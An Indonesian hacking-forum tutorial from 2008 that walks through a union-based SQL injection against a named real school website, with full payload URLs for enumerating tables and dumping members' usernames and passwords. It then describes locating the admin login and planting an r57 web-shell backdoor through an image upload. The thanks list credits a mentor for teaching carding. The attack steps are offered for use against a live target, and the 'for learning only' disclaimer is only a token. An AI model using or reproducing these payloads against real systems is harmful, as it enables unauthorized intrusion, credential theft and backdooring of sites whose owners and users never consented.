www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 4
0 Members | 4 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2840
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 5:30 pm
Articles
By D4rXz[at]zonehacking.com
Published: October 17, 2008
Updated: October 18, 2008
Print    Email

-----------------------------------------------------------------
|Tittle : Berawal SQL Blind Berakhir r57 |
|Level : Beginner |
|Author : D4rXz[at]zonehacking.com |
|Note : Tutorial ini hanya untuk pembelajaran, semoga pembaca |
| dapat bersikap bijaksana dan diluar semua itu penulis |
| tidak bertanggung jawab atas aksi dari content ini |
| oleh pihak ke dua atau tiga dst. |
-----------------------------------------------------------------

1) Bagaimana mengetahui site tersebut mengandung vuln SQL Injection ?
Biasanya menggunakan petik tunggal (') atau menggunakan operator (and 1=2) untuk mendapatkan error yang mengindikasikan respon dari mysql server.

example respon server mysql :

http://sma74jkt.sch.id/berita/media_detail.php?recordID=240'

2) Memeriksa Kolom
Bagian ini adalah pemeriksaan jumlah kolom sampai dimana kondisi adalah false. Dalam kasus ini si penulis menggunakan 'order by'. Cara melakukan pengecheckan dimulai dari 1 s/d kondisi halaman mendapatkan kondisi false. Dalam kasus ini kondisi false adalah 20 jadi kolom yang tersedia adalah sampai dengan 19.

example kondisi false check kolom :
kolomhttp://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19'



note : Melakukan "order by" bisa dengan cara satu-persatu sampai false. http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+19'

http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+20' [kondisi false]
jadi tanpa harus dituliskan semua kolum.

3) Mencari Hole Kolom
Untuk mencari Hole Kolom ini tidak sulit jika kita sudah menentukan jumlah kolom yang tersedia. Dalam kasus ini menggunakan “union select”. Dan terlihat pada gambar hole kolom terdapat pada kolom 12. Yang nantinya segala informasi database akan dikeluarkan melaluli hole kolom tsb.

example penunjukan hole kolom :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19'



4) Melihat informasi versi MySQL
Mengapa kita perlu mengetahui info ini? Karena setiap metode hack pada MySQL versi 4 dan versi 5 berbeda [simple].
Dalam kasus ini penulis menggunakan version().

example info versi MySQL :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19'

5) Memeriksa Tabel
Untuk memeriksa tabel kita menggunakan 3 perintah dalam kasus ini.
Perintah yang digunakan adalah 'information.schema.tables'; 'table_name' dan 'limit [tanpa tanda petik dua].

example melihat table :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables'

example mencari table [limit]:
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables+limit+17,1'

note : temukan table yang menarik [user,anggota,admin] dengan merubah 1 s/d mendapatkan table yang menarik, dalam kasus ini di temukan tabel yang menarik pada 'limit 17,18' yaitu table anggota.

tips cara cepat [advanced]
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_schema=database()'



6) Melihat isi colum dari tabel
Ini adalah bagian langkah cara untuk mengetahui kolum-kolum pada tabel yang bersangkutan, si penulis menggunakan cara cepat dengan perintah 'group_concat(column_name)'.

example :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0×616e67676f7461'



7) Melihat data dari kolom-kolom tersebut
Ini adalah step terahkir. Dan peranan perintah 'group_concat” sangat membantu dalam hal efisiensi waktu.

example hasil penelusuran SQL Injection :
http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(no_anggota,0×3a,nama,0×3a,nama_lengkap,0×3a,password,0×3a,status,0×3a,level),13,14,15,16,17,18,19+from+anggota'

note : 0×3a adalah bentuk hex dari ASCII ':' [tanpa tanda petik dua] si penulis sengaja menggunakan ini agar terlihat rapi.
atau pakai yang ini 0×7c7c untuk menghasilkan '||' [tanpa tanda petik].


—————–---------------------[ THE END SQL INJECTION ]---------------------————————

Mencari halaman login
Dalam kasus ini si penulis hanya mengunakan teknik insting/naluri/tebak2an. Namun ada cara yang lebih rasional dalam mencari halaman login admin dengan menggunakan tool scanner. Dalam kasus ini site tersebut halaman login berada pada:
http://sma74jkt.sch.id/login.php



9) Menanam BackDoor r57
pada fasilitas upload gambar.







note : kita manfaatkan fasilitas tranfersal directory [masih ingat pada mission 4 [at] boleh-hacking.com ]

----------------------------[ The End Install BackDoor r57 ]-----------------------

Akhirkata aku mengucapkan terima kasih sebesarnya2 kepada :

- Adhietslank [om ini ngajarin tentang aplikasi exploit (bot, proxy, psyBNC)]
- home_edition2001/2007 [om yang satu ini ngajarin carding lewat r57]
- ich_fti [om ini ngajarin aku SQL Injection]
- fl3xu5 [om ini mw berbagi wawasan hacking wirelless]
- jack[at]zonehacking [thank's yah kerpercayaan moderatornya]
- GheMaX[at]zonehacking [thank's yah kepercayaan kerja samanya]
- Ali3n[at]zonehacking [thank's yah tutor metasploit]
- dll yang tak bisa aku sebutkan satu-persatu karena keterbatasan tempat.

----------------------------[ The End ]------------------------------






View Comments (15)